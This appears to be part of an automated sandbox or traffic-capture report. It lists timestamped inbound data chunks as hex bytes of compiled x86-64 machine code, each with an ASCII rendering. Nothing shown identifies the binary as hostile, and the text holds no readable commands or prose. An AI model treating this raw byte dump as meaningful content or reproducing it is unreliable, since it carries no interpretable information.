74 08 48 8b cb e8 97 34 10 00 48 c7 43 30 00 00 00 00 48 8d 05 c0 bb 14 Data Ascii: uHCHK]HCC!t<"HLcCHHSAtD{ H+HEHHD$ (tHuC {C HL$ H(tHuHKFHKHHC(Ht;@$fCu{ tH4HC0H
2023-11-18 09:02:42 UTC	8823	IN	Data Raw: 00 00 48 8b 4d 17 48 33 cc e8 85 07 fe ff 48 81 c4 e0 00 00 00 41 5f 41 5e 5e 5b 5d c3 cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 18 4c 89 74 24 20 55 48 8b ec 48 81 ec 80 00 00 00 48 8b d9 33 f6 49 8b 08 49 8b f8 41 be 02 02 00 00 48 85 c9 75 04 8b c6 eb 2e 0f b7 51 08 0f b7 c2 66 41 23 c6 66 41 3b c6 75 0c 80 79 0a 01 75 06 48 8b 41 10 eb 11 f6 c2 01 74 05 48 8b c6 eb 07 b2 01 e8 d9 15 10 00 33 c9 48 89 4d a0 48 89 4d a8 48 89 4d b0 48 89 4d b8 48 89 4d c0 48 89 4d c8 48 85 c0 0f 84 08 01 00 00 4c 8b c0 48 8d 4d a0 48 8b d3 e8 17 18 00 00 85 c0 0f 85 f1 00 00 00 48 8b 4f 08 48 85 c9 75 05 48 8b c6 eb 2e 0f b7 51 08 0f b7 c2 66 41 23 c6 66 41 3b c6 75 0c 80 79 0a 01 75 06 48 8b 41 10 eb 11 f6 c2 01 74 05 48 8b c6 eb 07 b2 01 e8 63 15 10 Data Ascii: HMH3HA_A^^[]H\$Ht$H\|$Lt$ UHHH3IIAHu.QfA#fA;uyuHAtH3HMHMHMHMHMHMHLHMHHOHuH.QfA#fA;uyuHAtHc
2023-11-18 09:02:42 UTC	8826	IN	Data Raw: 28 0f b6 04 28 84 c0 74 0e 3c 07 75 0e 48 8b cb e8 b1 ff ff ff eb 04 80 4b 01 04 80 3b 06 72 08 8b 43 04 83 c0 02 eb 05 b8 02 00 00 00 03 f8 3b fe 7e c3 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 30 48 8b f9 48 8d 0d dc 9e 14 00 e8 b7 8a 12 00 48 8b 0f 41 b1 01 49 83 c8 ff c7 47 24 01 00 00 00 48 8b d0 48 c7 44 24 20 ff ff ff ff 48 8b d8 e8 c2 0b 10 00 48 8b cb 48 8b 5c 24 40 48 83 c4 30 5f e9 f0 b9 12 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 30 80 3a 24 49 8b d9 4d 8b c8 48 c7 44 24 48 00 00 00 00 48 8b f9 75 1f 4c 8d 42 01 33 d2 48 8d 44 24 48 48 89 44 24 20 e8 ea 01 00 00 48 8b 54 24 48 48 85 d2 74 58 fe 47 21 48 8d 0d 26 9e 14 Data Ascii: ((t<uHK;rC;~H\$0Hl$8Ht$@H _H\$WH0HHHAIG$HHD$ HHH\$@H0_H\$WH0:$IMHD$HHuLB3HD$HHD$ HT$HHtXG!H&
2023-11-18 09:02:42 UTC	8830	IN	Data Raw: 00 48 c1 e1 04 33 d2 48 89 4c 24 40 48 89 54 01 08 0f b6 0c 1e 42 80 bc 09 40 e2 16 00 00 74 04 ff c6 eb ed 66 ff 47 22 66 39 6f 22 0f 87 fa fd ff ff 8b d6 48 8b cf e8 45 fd ff ff b9 ff ff 00 00 66 01 4f 22 85 c0 78 76 8b f0 4c 8d 0d 6f d8 fd ff 8b c0 0f b6 0c 18 42 80 bc 09 40 e2 16 00 00 74 1f 0f 1f 40 00 66 66 0f 1f 84 00 00 00 00 00 ff c6 0f b6 0c 1e 42 80 bc 09 40 e2 16 00 00 75 ef 8b c6 0f b6 0c 18 80 f9 2c 75 04 ff c6 eb 80 80 f9 5d 0f 85 92 fd ff ff 8b 0f 48 8b 47 08 48 8b 54 24 40 2b 4c 24 48 ff c9 89 4c 02 04 8d 46 01 48 8b 74 24 50 48 83 c4 20 5f 5d 5b c3 83 f8 fd e9 a9 fe ff ff 80 f9 22 0f 85 f9 00 00 00 32 d2 8d 75 01 0f b6 0c 1e 88 54 24 48 f6 c1 e0 0f 84 46 fd ff ff 41 b9 41 04 44 01 0f 1f 44 00 00 80 f9 5c 75 45 ff c6 0f b6 0c 1e 48 8d 14 Data Ascii: H3HL$@HTB@tfG"f9o"HEfO"xvLoB@t@ffB@u,u]HGHT$@+L$HLFHt$PH _]["2uT$HFAADD\uEH
2023-11-18 09:02:42 UTC	8835	IN	Data Raw: 08 57 48 83 ec 20 48 8b d9 48 8b 49 08 e8 7a 99 12 00 48 8b 4b 18 33 ff 48 89 7b 08 48 89 3b e8 68 99 12 00 48 89 7b 18 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc 80 39 06 72 06 8b 41 04 ff c0 c3 b8 01 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 30 48 8b d9 48 8d 05 1c 99 12 00 48 83 c9 ff 80 7b 20 00 48 8b 53 08 48 8b 3b 48 0f 45 c1 48 8b 4b 18 48 81 f9 ff ff ff 7f 76 15 48 83 f8 ff 74 05 48 8b ca ff d0 48 8b cf e8 f9 4f 0f 00 eb 24 4c 63 c1 41 b1 01 48 8b 0f 48 89 44 24 20 e8 94 ea 0f 00 85 c0 74 0d 48 8b cf 83 f8 12 74 da e8 43 4f 0f 00 48 8d 43 22 48 c7 43 10 64 00 00 00 48 89 43 08 48 c7 43 18 00 00 00 00 c6 43 20 01 48 8b 5c 24 40 48 83 c4 30 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c Data Ascii: WH HHIzHK3H{H;hH{H\$0H _9rAH\$WH0HHH{ HSH;HEHKHvHtHHO$LcAHHD$ tHtCOHC"HCdHCHCC H\$@H0_H\
2023-11-18 09:02:42 UTC	8839	IN	Data Raw: ff c1 41 89 4c 24 40 3b ce 7c ec 41 be 0b 01 00 00 48 89 5c 24 48 4c 89 7c 24 38 45 39 69 38 75 07 41 39 74 24 40 7c 14 49 8b 54 24 20 44 38 6a 14 74 72 41 c7 44 24 18 01 00 00 00 85 ff 75 48 41 83 7c 24 18 00 75 40 48 8b 45 40 83 78 38 00 75 36 41 39 74 24 40 7d 2b 49 8b 54 24 50 66 0f 1f 84 00 00 00 00 00 49 63 4c 24 40 48 83 3c ca 00 75 0c 8d 41 01 41 89 44 24 40 3b c6 7c e8 41 39 74 24 40 41 0f 44 fe 8b c7 48 8b 5c 24 48 4c 8b 7c 24 38 4c 8b 74 24 40 48 83 c4 50 41 5d 41 5c 5f 5e 5d c3 48 8b 42 58 41 8b 5c 24 30 0f b7 48 04 48 6b c1 78 48 8b 8c 10 b8 00 00 00 8b b4 10 c0 00 00 00 ff ce 48 85 c9 4c 8d 71 01 4d 0f 44 f5 85 db 78 2e 49 8b 4c 24 38 8b c3 3b f3 49 8b d6 0f 4c c6 4c 63 c0 e8 2a 43 ff ff 85 c0 78 06 75 11 3b de 7d 0d 41 c7 44 24 18 01 00 00 Data Ascii: AL$@;\|AH\$HL\|$8E9i8uA9t$@\|IT$ D8jtrAD$uHA\|$u@HE@x8u6A9t$@}+IT$PfIcL$@H<uAAD$@;\|A9t$@ADH\$HL\|$8Lt$@HPA]A\_^]HBXA\$0HHkxHHLqMDx.IL$8;ILLc*Cxu;}AD$
2023-11-18 09:02:42 UTC	8843	IN	Data Raw: 8b c7 4c 2b cf 41 0f b6 08 43 0f b6 04 01 3b c8 75 1a 85 c9 75 24 48 8b cf 41 c7 06 01 00 00 00 e8 5d 78 12 00 8b c5 e9 85 00 00 00 42 0f b6 14 10 42 0f b6 0c 11 3b ca 75 05 49 ff c0 eb c6 4c 8d 0d 04 5b 14 00 4c 8b c7 4c 2b cf 66 0f 1f 44 00 00 41 0f b6 08 43 0f b6 04 01 3b c8 75 17 85 c9 75 21 48 8b cf 41 c7 06 02 00 00 00 e8 10 78 12 00 8b c5 eb 3b 42 0f b6 14 10 42 0f b6 0c 11 3b ca 75 05 49 ff c0 eb c9 48 8b d7 48 8d 0d c7 5a 14 00 e8 7a 48 12 00 48 8b cf 49 89 07 bd 01 00 00 00 e8 da 77 12 00 8b c5 eb 05 b8 07 00 00 00 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 83 c4 20 41 5f 41 5e 5f c3 cc cc cc cc cc cc cc cc 81 f9 00 40 00 00 73 06 b8 02 00 00 00 c3 81 f9 00 00 20 00 73 06 b8 03 00 00 00 c3 81 f9 00 00 00 10 1b c0 83 c0 05 c3 cc cc cc cc cc Data Ascii: L+AC;uu$HA]xBB;uIL[LL+fDAC;uu!HAx;BB;uIHHZzHHIwH\$@Hl$HHt$PH A_A^_@s s
2023-11-18 09:02:42 UTC	8847	IN	Data Raw: 24 78 49 8b d9 48 89 54 24 30 48 8b d1 48 89 44 24 38 4c 89 7c 24 70 48 89 4c 24 40 44 0f b6 03 4c 8d 0d 26 65 14 00 44 8b e3 48 ff c3 45 2b e5 41 81 f8 c0 00 00 00 72 62 41 8d 80 40 ff ff ff 46 0f b6 04 08 8b c8 48 3b de 74 22 90 0f b6 0b 0f b6 c1 24 c0 3c 80 75 15 41 c1 e0 06 48 ff c3 0f b6 c9 83 e1 3f 44 03 c1 48 3b de 75 df 41 81 f8 80 00 00 00 72 1c 41 8b c0 25 00 f8 ff ff 3d 00 d8 00 00 74 0d 41 8b c0 83 e0 fe 3d fe ff 00 00 75 08 41 b8 fd ff 00 00 eb 09 45 85 c0 0f 84 7b 03 00 00 4c 8b fb 48 3b de 0f 83 6f 03 00 00 8b 2a 85 ed 74 14 33 d2 41 8b c8 e8 9d f8 ff ff 44 8b c0 4c 8d 0d 83 64 14 00 41 81 f8 80 00 00 00 73 0f 44 88 44 24 48 48 8d 7c 24 49 e9 9a 00 00 00 41 8b c0 41 81 f8 00 08 00 00 73 1f c1 e8 06 48 8d 7c 24 4a 24 1f 41 80 e0 3f 2c 40 41 Data Ascii: $xIHT$0HHD$8L\|$pHL$@DL&eDHE+ArbA@FH;t"$<uAH?DH;uArA%=tA=uAE{LH;o*t3ADLdAsDD$HH\|$IAAsH\|$J$A?,@A
2023-11-18 09:02:42 UTC	8851	IN	Data Raw: 14 00 88 47 02 8d 43 ff e9 f6 01 00 00 83 fb 05 7e 3c 8b 05 88 39 14 00 8d 53 fb 48 63 fa 48 03 f9 3b 07 75 29 0f b6 05 78 39 14 00 3a 47 04 75 1d 45 33 c0 e8 af 08 00 00 85 c0 0f 84 c4 01 00 00 b8 61 6c 00 00 66 89 07 e9 b2 01 00 00 83 fb 07 0f 8e ae 01 00 00 8b 05 4b 39 14 00 8d 53 f9 48 63 fa 48 03 f9 3b 07 75 45 0f b7 05 3b 39 14 00 66 3b 47 04 75 38 0f b6 05 30 39 14 00 3a 47 06 75 2c 45 33 c0 e8 5d 08 00 00 85 c0 0f 84 72 01 00 00 0f b7 05 86 00 14 00 66 89 07 0f b6 05 7e 00 14 00 88 47 02 8d 43 fc e9 54 01 00 00 8b 05 fb 38 14 00 3b 07 75 45 0f b7 05 f4 38 14 00 66 3b 47 04 75 38 0f b6 05 e9 38 14 00 3a 47 06 75 2c 45 33 c0 e8 0e 08 00 00 85 c0 0f 84 23 01 00 00 0f b7 05 47 00 14 00 66 89 07 0f b6 05 3f 00 14 00 88 47 02 8d 43 fc e9 05 01 00 00 8b Data Ascii: GC~<9SHcH;u)x9:GuE3alfK9SHcH;uE;9f;Gu809:Gu,E3]rf~GCT8;uE8f;Gu88:Gu,E3#Gf?GC
2023-11-18 09:02:42 UTC	8855	IN	Data Raw: 90 00 00 00 33 db 44 8b d2 48 8b f9 45 85 c0 7e 3f 41 83 e8 01 4c 8b 99 98 00 00 00 44 8b cb 78 2f 66 90 43 8d 04 08 99 2b c2 d1 f8 48 63 c8 41 8b 14 8b 44 3b d2 74 13 7e 06 44 8d 48 01 eb 04 44 8d 40 ff 45 3b c1 7d da eb 05 bb 01 00 00 00 41 8b ca e8 6b d3 ff ff 48 63 c8 0f b6 84 39 a0 00 00 00 33 c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 41 54 41 56 41 57 48 83 ec 30 4d 63 f8 4d 8b e1 4c 8b f2 41 f6 c7 01 74 10 b8 01 00 00 00 48 83 c4 30 41 5f 41 5e 41 5c c3 48 89 5c 24 50 48 89 6c 24 58 48 89 74 24 68 48 89 7c 24 28 4c 89 6c 24 20 e8 09 a7 06 00 33 f6 85 c0 0f 85 a9 03 00 00 b9 c0 00 00 00 e8 e5 47 12 00 48 8b e8 48 85 c0 0f 84 93 03 00 00 33 d2 48 8d 1d 48 27 14 00 41 b8 c0 00 00 00 48 8b c8 e8 d2 9d Data Ascii: 3DHE~?ALDx/fC+HcAD;t~DHD@E;}AkHc93H\$0H _ATAVAWH0McMLAtH0A_A^A\H\$PHl$XHt$hH\|$(Ll$ 3GHH3HH'AH
2023-11-18 09:02:42 UTC	8858	IN	Data Raw: 62 3c 12 00 48 8b d8 48 85 c0 75 17 49 89 04 24 8d 43 07 48 8b 5c 24 50 48 83 c4 28 41 5f 41 5c 5e 5d c3 4c 89 6c 24 68 33 d2 41 b8 80 00 00 00 4c 89 74 24 20 48 8b cb e8 39 92 fd ff 0f 28 05 72 c7 16 00 4c 8d 2d fb 68 fd ff 0f 11 03 45 33 f6 48 89 7c 24 58 0f 28 0d 69 c7 16 00 0f 11 4b 10 0f 28 05 6e c7 16 00 0f 11 43 20 0f 28 0d 73 c7 16 00 0f 11 4b 30 0f 28 05 78 c7 16 00 0f 11 43 40 0f 28 0d 7d c7 16 00 0f 11 4b 50 0f 28 05 82 c7 16 00 0f 11 43 60 0f 28 0d 87 c7 16 00 0f 11 4b 70 0f 1f 00 45 3b f7 0f 8d ea 00 00 00 4c 8b 06 48 8b 46 08 4d 85 c0 0f 84 c3 00 00 00 49 8b f8 4d 8d 9d 78 b2 16 00 48 f7 df 4d 8b c8 4c 03 df 0f 1f 40 00 45 0f b6 11 43 0f b6 0c 0b 44 3b d1 75 2b 45 85 d2 75 3c 44 38 10 0f 84 95 00 00 00 0f 1f 40 00 0f b6 08 84 c9 78 08 48 0f Data Ascii: b<HHuI$CH\$PH(A_A\^]Ll$h3ALt$ H9(rL-hE3H\|$X(iK(nC (sK0(xC@(}KP(C`(KpE;LHFMIMxHML@ECD;u+Eu<D8@xH
2023-11-18 09:02:42 UTC	8862	IN	Data Raw: 40 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b c4 4c 89 40 18 48 89 50 10 55 56 48 83 ec 78 48 89 58 08 33 ed 48 89 78 e8 33 f6 49 8b d8 4c 89 68 d8 48 8b fa 4c 8b 29 4c 89 70 d0 4c 8b f1 48 89 68 b8 48 89 68 c0 48 89 48 a8 39 71 10 75 1b 4c 8b 41 20 48 8d 51 18 48 8b 49 08 e8 6d 7f 00 00 8b f0 41 c7 46 10 01 00 00 00 85 f6 75 10 49 8b 4e 08 4c 8b c3 33 d2 e8 51 8b 00 00 8b f0 33 d2 89 54 24 38 85 f6 0f 85 13 02 00 00 4c 89 64 24 68 41 b9 02 02 00 00 44 8b 64 24 4c 41 ba 00 40 00 00 4c 89 7c 24 50 44 8b 7c 24 48 90 41 3b 55 18 0f 8d c7 01 00 00 c7 44 24 3c 00 00 00 00 49 8b 45 28 48 63 ca 80 3c 01 00 0f 85 ce 00 00 00 8d 42 02 48 63 c8 48 8b 0c cf 48 85 c9 75 04 33 db eb 3d 44 0f b7 41 08 41 0f b7 c0 66 41 23 c1 66 41 3b c1 75 0c 80 79 0a 01 75 Data Ascii: @_HL@HPUVHxHX3Hx3ILhHL)LpLHhHhHH9quLA HQHImAFuINL3Q3T$8Ld$hADd$LA@L\|$PD\|$HA;UD$<IE(Hc<BHcHHu3=DAAfA#fA;uyu
2023-11-18 09:02:42 UTC	8867	IN	Data Raw: 02 02 00 00 0f 1f 84 00 00 00 00 00 41 3b 7d 18 0f 8f 67 01 00 00 49 8b 45 28 80 7c 28 ff 00 0f 85 0d 01 00 00 48 85 f6 74 1c 8b d7 48 8b ce e8 18 c2 0e 00 8b d7 48 8b ce 48 8b d8 e8 3b c5 0e 00 e9 87 00 00 00 4d 85 e4 0f 84 e3 00 00 00 4b 8b 0c 26 48 85 c9 75 04 33 db eb 35 0f b7 51 08 0f b7 c2 66 41 23 c0 66 41 3b c0 75 0c 80 79 0a 01 75 06 48 8b 59 10 eb 13 f6 c2 01 74 04 33 db eb 0a b2 01 e8 73 68 0f 00 48 8b d8 ba 00 40 00 00 4b 8b 04 26 0f b7 48 08 f6 c1 02 74 0b 80 78 0a 01 75 05 8b 48 0c eb 26 f6 c1 10 74 0c 66 85 ca 8b 48 0c 74 19 03 08 eb 15 f6 c1 01 74 04 33 c9 eb 0c b2 01 48 8b c8 e8 3f 54 0f 00 8b c8 33 d2 89 54 24 3c 48 85 db 74 2f 49 8b 45 70 48 8d 15 b7 00 00 00 48 89 54 24 28 4c 8b cb 89 4c 24 20 48 8d 54 24 30 49 8b 4d 68 41 b8 04 00 00 Data Ascii: A;}gIE(\|(HtHHH;MK&Hu35QfA#fA;uyuHYt3shH@K&HtxuH&tfHtt3H?T3T$<Ht/IEpHHT$(LL$ HT$0IMhA
2023-11-18 09:02:42 UTC	8871	IN	Data Raw: 13 00 0f 11 49 30 0f 10 05 1a e6 13 00 0f 11 41 40 f2 0f 10 0d 1e e6 13 00 f2 0f 11 49 50 0f b7 05 1a e6 13 00 66 89 41 58 0f b6 05 11 e6 13 00 88 41 5a b8 02 02 00 00 66 89 43 08 c7 43 0c 5a 00 00 00 c6 43 0a 01 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b 41 08 b9 bf c3 00 00 49 8b 18 48 8b 78 08 0f b7 43 08 66 23 c1 b9 01 82 00 00 66 3b c1 75 25 80 7b 0b 70 75 1f 48 8b 0b 48 8d 15 2d e5 13 00 e8 e0 47 12 00 85 c0 75 0c 48 8b 43 10 48 85 c0 74 03 48 89 38 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 56 48 83 ec 20 48 89 5c 24 30 48 8b f1 48 8b 59 30 48 8b 0d 77 cb 16 00 48 89 7c 24 38 48 85 db 74 7d 48 8b 43 20 48 Data Ascii: I0A@IPfAXAZfCCZCH\$0H _H\$WH HAIHxCf#f;u%{puHH-GuHCHtH8H\$0H _@VH H\$0HHY0HwH\|$8Ht}HC H
2023-11-18 09:02:42 UTC	8875	IN	Data Raw: 00 00 48 39 50 18 74 09 48 8b 40 08 48 85 c0 75 f1 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 30 48 8b 44 24 60 4c 8b d1 48 89 8a 90 00 00 00 48 8b da 48 8d 0d 61 49 14 00 48 89 44 24 20 41 ff 52 18 48 c7 83 90 00 00 00 00 00 00 00 48 83 c4 30 5b c3 cc cc cc cc cc cc cc 48 89 5c 24 18 48 89 6c 24 20 56 41 54 41 55 41 56 41 57 48 83 ec 20 4c 8b 39 44 8b ea 4c 8b e1 48 8d 54 24 50 33 c0 49 8b cf 49 8b e9 48 89 44 24 50 4d 8b f0 e8 96 30 00 00 48 8b 74 24 50 8b d8 85 c0 0f 85 b2 00 00 00 c7 46 20 01 00 00 00 4c 8d 46 40 48 b8 00 00 00 00 00 00 00 80 48 89 7c 24 58 48 89 46 28 41 8b d5 48 b8 ff ff ff ff ff ff ff 7f 48 89 46 30 4c 89 3e 49 8b 4c 24 40 e8 8b 1b 01 00 8b d8 85 c0 75 6b 48 8b 7e 40 45 33 c9 4c 8b 46 28 48 8b cf 49 8b 57 20 Data Ascii: H9PtH@Hu@SH0HD$`LHHHaIHD$ ARHH0[H\$Hl$ VATAUAVAWH L9DLHT$P3IIHD$PM0Ht$PF LF@HH\|$XHF(AHHF0L>IL$@ukH~@E3LF(HIW
2023-11-18 09:02:42 UTC	8879	IN	Data Raw: 33 c0 48 83 c4 38 c3 48 8b 44 24 60 4c 8b ca 4c 8b 51 70 49 8b d3 48 8b 49 68 48 89 44 24 28 44 89 44 24 20 41 b8 08 00 00 00 41 ff 52 10 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b 01 48 8b fa 48 8b 58 28 33 c0 39 43 10 75 18 4c 8b 43 20 48 8d 53 18 48 8b 4b 08 e8 54 3d 00 00 c7 43 10 00 00 00 00 85 c0 75 14 48 8b 4b 18 48 89 0f b9 0b 01 00 00 48 83 7b 18 00 0f 4e c1 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc 48 8b 09 48 8b 49 28 e9 74 b1 ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 01 48 8b 48 18 8b 41 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 81 90 00 00 00 48 8b 40 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 Data Ascii: 3H8HD$`LLQpIHIhHD$(DD$ AARH8H\$WH HHHX(39CuLC HSHKT=CuHKHH{NH\$0H _HHI(tHHHAHH@H
2023-11-18 09:02:42 UTC	8883	IN	Data Raw: c3 48 c7 44 c5 28 00 00 00 00 85 ff 75 3d 4c 8b 44 24 40 8d 57 01 48 8b 4e 38 4d 85 c0 74 07 e8 24 75 0e 00 eb 1b 4c 8b 46 28 e8 a9 77 0e 00 4c 8b 46 30 ba 02 00 00 00 48 8b 4e 38 e8 97 77 0e 00 48 8b ce e8 bf 08 00 00 8b f8 48 8b 44 24 58 4c 8b b4 24 b0 00 00 00 49 89 84 24 a8 00 00 00 8b c7 48 83 c4 60 41 5f 41 5d 41 5c 5f 5e 5d 5b c3 0f 1f 00 be f7 02 00 a3 f7 02 00 f5 f6 02 00 09 f6 02 00 eb f5 02 00 d9 f7 02 00 00 01 05 05 05 05 05 05 05 05 05 02 05 05 05 05 02 03 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 04 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b fa 48 8b d9 48 85 c9 74 61 e8 b6 5e 0e 00 83 f8 01 75 57 0f b7 43 08 a8 24 74 0e Data Ascii: HD(u=LD$@WHN8Mt$uLF(wLF0HN8wHHD$XL$I$H`A_A]A\_^][H\$WH HHHta^uWC$t
2023-11-18 09:02:42 UTC	8887	IN	Data Raw: 8b 5b 30 4c 8b c5 33 d2 48 8b cf e8 c3 1e fd ff 48 8d 87 b8 00 00 00 48 89 47 10 48 8b 43 48 48 89 47 08 48 ff 43 28 48 8b 43 28 48 89 7b 48 48 89 47 18 41 8b c6 eb 05 b8 07 00 00 00 48 8b 5c 24 30 48 8b 6c 24 38 48 89 3e 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5e c3 cc cc cc cc cc cc cc cc 48 83 ec 28 48 8b 41 30 48 8b 40 48 48 85 c0 74 0e 48 39 08 74 54 48 8b 40 08 48 85 c0 75 f2 48 8b 41 28 48 89 5c 24 20 48 8b 58 08 48 8b cb e8 dc b7 00 00 48 3b 43 78 74 1c 48 8b 8b 80 00 00 00 48 85 c9 74 10 e8 c5 c0 00 00 48 c7 83 80 00 00 00 00 00 00 00 8b 43 34 c7 43 34 00 00 00 00 48 8b 5c 24 20 48 83 c4 28 c3 33 c0 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 55 56 57 41 54 41 55 41 57 48 83 ec 40 45 33 e4 48 8b e9 48 8b 49 18 48 8b da Data Ascii: [0L3HHHGHCHHGHC(HC(H{HHGAH\$0Hl$8H>Ht$@H\|$HH A^H(HA0H@HHtH9tTH@HuHA(H\$ HXHH;CxtHHtHC4C4H\$ H(3H(@SUVWATAUAWH@E3HHIH
2023-11-18 09:02:42 UTC	8890	IN	Data Raw: 72 f8 48 8b 75 c7 e8 6b 1b 06 00 85 c0 75 1d 48 8b d7 48 8b ce e8 8c b7 11 00 48 85 c0 74 0d 44 8b 45 cf 89 7d d3 48 89 45 c7 eb 12 44 8b 75 cf 41 c7 45 34 07 00 00 00 eb 1e 48 8b 45 c7 49 63 c8 48 03 c8 8b 05 f4 94 13 00 89 01 44 8b 75 cf 41 83 c6 04 44 89 75 cf 48 8b 75 c7 4c 8b 6d f7 66 0f 1f 44 00 00 41 3b de 0f 8d 58 02 00 00 48 63 c3 ff c3 0f b6 0c 30 84 c9 0f 89 82 00 00 00 ff cb 4c 63 cb 4c 03 ce 41 0f b6 09 84 c9 78 07 b8 01 00 00 00 eb 69 41 0f b6 51 01 84 d2 78 0f 83 e1 7f b8 02 00 00 00 c1 e1 07 0b ca eb 51 41 0f b6 41 02 c1 e1 0e 0b c8 8b c1 84 c9 78 16 25 7f c0 1f 00 8b ca 83 e1 7f c1 e1 07 0b c8 b8 03 00 00 00 eb 2b 45 0f b6 01 45 84 c0 78 0b 41 8b c8 b0 01 48 89 4d d7 eb 10 48 8d 55 d7 49 8b c9 e8 71 43 ff ff 48 8b 4d d7 0f ba f1 1f 0f b6 Data Ascii: rHukuHHHtDE}HEDuAE4HEIcHDuADuHuLmfDA;XHc0LcLAxiAQxQAAx%+EExAHMHUIqCHM
2023-11-18 09:02:42 UTC	8894	IN	Data Raw: 00 00 4d 8b f1 33 d2 4e 8d 04 cd 00 00 00 00 e8 dd 01 fd ff ba 01 00 00 00 49 8b cf e8 90 a8 00 00 41 83 7f 34 00 48 8b f8 75 72 83 78 08 00 74 6c 48 8b 08 44 0f b6 01 45 84 c0 78 0a 41 8b c0 48 89 03 b0 01 eb 08 48 8b d3 e8 92 33 ff ff 0f b6 d8 3b 5f 08 7d 46 48 89 6c 24 48 33 ed 0f 1f 00 49 3b ee 7d 32 48 63 cb 48 03 0f 44 0f b6 01 45 84 c0 78 0a 41 8b c0 48 89 06 b0 01 eb 08 48 8b d6 e8 5a 33 ff ff 0f b6 c0 48 ff c5 03 d8 48 83 c6 08 3b 5f 08 7c c9 48 8b 6c 24 48 4c 8b 74 24 20 48 8b 74 24 50 48 8b 5c 24 40 48 85 ff 74 5b 83 3d f9 36 16 00 00 74 49 48 8b 0d b0 6c 16 00 48 85 c9 74 06 ff 15 65 37 16 00 48 8b cf ff 15 14 37 16 00 48 ff 0d 5d 6d 16 00 48 63 c8 48 29 0d 0b 6d 16 00 48 8b cf ff 15 ea 36 16 00 48 8b 0d 7b 6c 16 00 48 85 c9 74 11 ff 15 40 37 Data Ascii: M3NIA4HurxtlHDExAHH3;_}FHl$H3I;}2HcHDExAHHZ3HH;_\|Hl$HLt$ Ht$PH\$@Ht[=6tIHlHte7H7H]mHcH)mH6H{lHt@7
2023-11-18 09:02:42 UTC	8899	IN	Data Raw: 8b cd e8 15 55 00 00 49 8b 44 24 58 c7 45 bf 01 00 00 00 0f b7 48 04 48 6b c9 78 4e 39 7c 21 70 0f 94 c0 41 88 44 24 14 4a 8b 84 21 c8 00 00 00 49 89 44 24 50 49 8b d4 49 8b cd e8 ec 6f 00 00 85 c0 0f 85 64 ff ff ff 49 8b d4 49 8b cd e8 49 40 00 00 85 c0 0f 84 f1 fd ff ff 48 8b 7d f7 8b 5d 9f 45 8b ef 4c 8b 65 4f 8b c3 48 c1 e0 04 4d 8b f7 4c 8b 7d c7 48 89 45 f7 49 8b c7 48 89 45 cf 83 3f 00 75 1b 4d 63 cd 48 8d 55 af 49 c1 e1 04 44 8b c3 4d 03 cf 49 8b cc ff 55 df 48 8b 45 cf 44 03 eb 49 63 f5 4c 3b f6 0f 8d 8e 00 00 00 48 8b d8 49 2b f6 66 0f 1f 44 00 00 48 8b 3b 48 85 ff 74 5b 83 3d 61 26 16 00 00 74 49 48 8b 0d 18 5c 16 00 48 85 c9 74 06 ff 15 cd 26 16 00 48 8b cf ff 15 7c 26 16 00 48 ff 0d c5 5c 16 00 48 8b cf 48 63 d0 48 29 15 70 5c 16 00 ff 15 52 Data Ascii: UID$XEHHkxN9\|!pAD$J!ID$PIIodIII@H}]ELeOHML}HEIHE?uMcHUIDMIUHEDIcL;HI+fDH;Ht[=a&tIH\Ht&H\|&H\HHcH)p\R
2023-11-18 09:02:42 UTC	8903	IN	Data Raw: e8 22 1a 01 00 85 c0 0f 85 b7 00 00 00 48 63 4b 08 41 bb 01 00 00 00 48 03 0b 48 83 ff 7f 77 0c 40 80 e7 7f 41 8b c3 40 88 39 eb 2b 48 81 ff ff 3f 00 00 77 1a 48 8b c7 48 c1 e8 07 0c 80 40 80 e7 7f 88 01 40 88 79 01 b8 02 00 00 00 eb 08 48 8b d7 e8 70 11 ff ff 01 43 08 8d 04 36 48 63 4b 08 48 03 0b 48 63 d0 48 83 fa 7f 77 07 80 e2 7f 88 11 eb 2a 48 81 fa ff 3f 00 00 77 19 48 8b c2 41 bb 02 00 00 00 48 c1 e8 07 0c 80 80 e2 7f 88 01 88 51 01 eb 08 e8 2c 11 ff ff 44 8b d8 44 01 5b 08 4c 8b c6 48 63 4b 08 48 03 0b 48 8b 55 08 e8 f2 d7 fc ff 01 73 08 48 63 43 08 48 03 03 33 c9 48 89 08 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 